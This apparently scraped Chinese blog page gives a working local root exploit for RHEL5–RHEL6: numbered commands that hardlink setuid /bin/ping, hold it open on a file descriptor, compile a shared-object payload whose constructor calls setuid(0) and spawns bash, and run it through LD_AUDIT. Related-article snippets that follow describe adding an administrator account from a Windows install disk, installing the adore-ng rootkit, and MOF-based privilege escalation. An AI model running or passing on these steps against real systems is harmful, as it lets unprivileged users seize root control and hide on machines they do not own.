普通用户提权

说明:RHEL5—RHEL6下  都可以提权

1. ls -ld /tmp/

2. ls -l /bin/ping

3. mkdir /tmp/exploit ; ln /bin/ping /tmp/exploit/target

4. exec 3< /tmp/exploit/target ;  rm -rf /tmp/exploit/ ; ls -l /proc/$$/fd/3

5. vim payload.c

void __attribute__((constructor)) init()

{

setuid(0);

system("/bin/bash");

}

6. gcc -w -fPIC -shared -o /tmp/exploit payload.c ; ls -l /tmp/exploit

7. LD_AUDIT="\0RIGIN" exec /proc/self/fd/3

时间: 2024-08-02 19:38:05

普通用户提权的相关文章

使用windows 7 系统安装盘 DOS普通用户提权为管理员

使用windows 7 系统安装盘启动,到选择安装界面时,按shift + F10 键 调出 DOS界面 执行以下命令 net user 用户名 密码 /add 建立用户 net localgroup Administrators 用户名 /add 把"用户"添加到管理员中使其具有管理员权限,注意Administrator后加s用复数 附加:相关命令net user guest /active:yes 激活guest用户 net user 查看有哪些用户 net user 帐户名 查看

adore-ng笔记和Linux普通用户提权

官网:https://github.com/trimpsyw/adore-ng 安装: [[email protected] ~]# unzipadore-ng-master.zip [[email protected] ~]# cdadore-ng-master [[email protected] adore-ng-master]#rpm  -ivh/mnt/Packages/kernel-devel-2.6.32-220.el6.x86_64.rpm yum install gcc* [[

Windows中使用命令行给普通用户提权成管理员组

在进入CMD后 1.  首先查看当前用户信息 net user UserName 2. 新建用户.修改密码 新建用户  net user add UserName 修改密码  net user UserName * 3 将用户加入到本地组 net localgroup administrators UserName /add 4 删除用户 net user UserName /del

RHEL5-6普通用户提权root

[[email protected] ~]# whoami   ##我是谁 root [[email protected] ~]# useradd putong [[email protected] ~]# su - putong [[email protected] ~]$ whoami putong [[email protected] ~]$ ll -d /tmp/ drwxrwxrwt. 3 root root 4096 12月  2 03:11 /tmp/ [[email protec

RHEL5-6普通用户提权

[[email protected] ~]# whoami   ##我是谁 root [[email protected] ~]# useradd putong [[email protected] ~]# su - putong [[email protected] ~]$ whoami putong [[email protected] ~]$ ll -d /tmp/ drwxrwxrwt. 3 root root 4096 12月  2 03:11 /tmp/ [[email protec

linux安全--用户账号--文件系统--用户切换与sudo提权

系统加固(服务器的本地安全) 1 用户账户安全 2 文件系统安全(系统配置文件的安全 服务的配置) 重要的数据文件 挂载的文件系统  mount 文件权限的种类  rwx     suid    sgid   T位     facl ++++++++++++++++++++++++++++++++++++++++++ 阻止普通用户关机: 建一个700文件夹 mkdir -m 700 文件夹名 cd /etc/security/console.spps mv  poweroff reboot ha

账号安全控制之用户切换与提权(二)

1.su命令--切换用户限制su命令切换root用户的权限首先修该/etc/pas.m/su配置文件,启用pam_wheel认证 实现个别用户切换,将授权使用su命令的用户怎加到wheel组命令:gpasswd -a 用户名 wheel 验证: sudo提权1.在配置文件/etc/sudoers中增加授权,使用visudo工具进行编辑.2.授权记录的基本格式如下user MACCHINE=COMMANDS 实验验证:1.使用jj账号设置ip地址下图可以得出不在wheel组里面的用户不能使用sud

mof提权原理及实现

关于 mof 提权的原理其实很简单,就是利用了c:/windows/system32/wbem/mof/目录下的 nullevt.mof 文件,每分钟都会在一个特定的时间去执行一次的特性,来写入我们的cmd命令使其被带入执行.下面简单演示下 mof 提权的过程! 首先将我们的 mof 提权脚本上传到可读写目录下,这里就不做演示了.接着我们选择 MySQL 提权项,输入我们已经获取的MySQL 账户信息,并执行如下命令: select load_file("C:/php/APMServ5.2.6/

文件权限以及提权

文件权限分基本权限和高级权限 基本权限: 权限主要是设置用户的权限 基本权限分三种: r:读 可以读取文件的内容 w:写 x:执行 权限            对文件的影响                   对目录的影响 r:读        可以读取文件的内容       可以列出目录的内容(文件名) w:写       可以更改文件的内容      可以创建或者删除目录中的任意一个文件 x:执行    可以作为命令执行文件   可以访问目录的内容(取决于目录中文件的权限) x权限对文件是非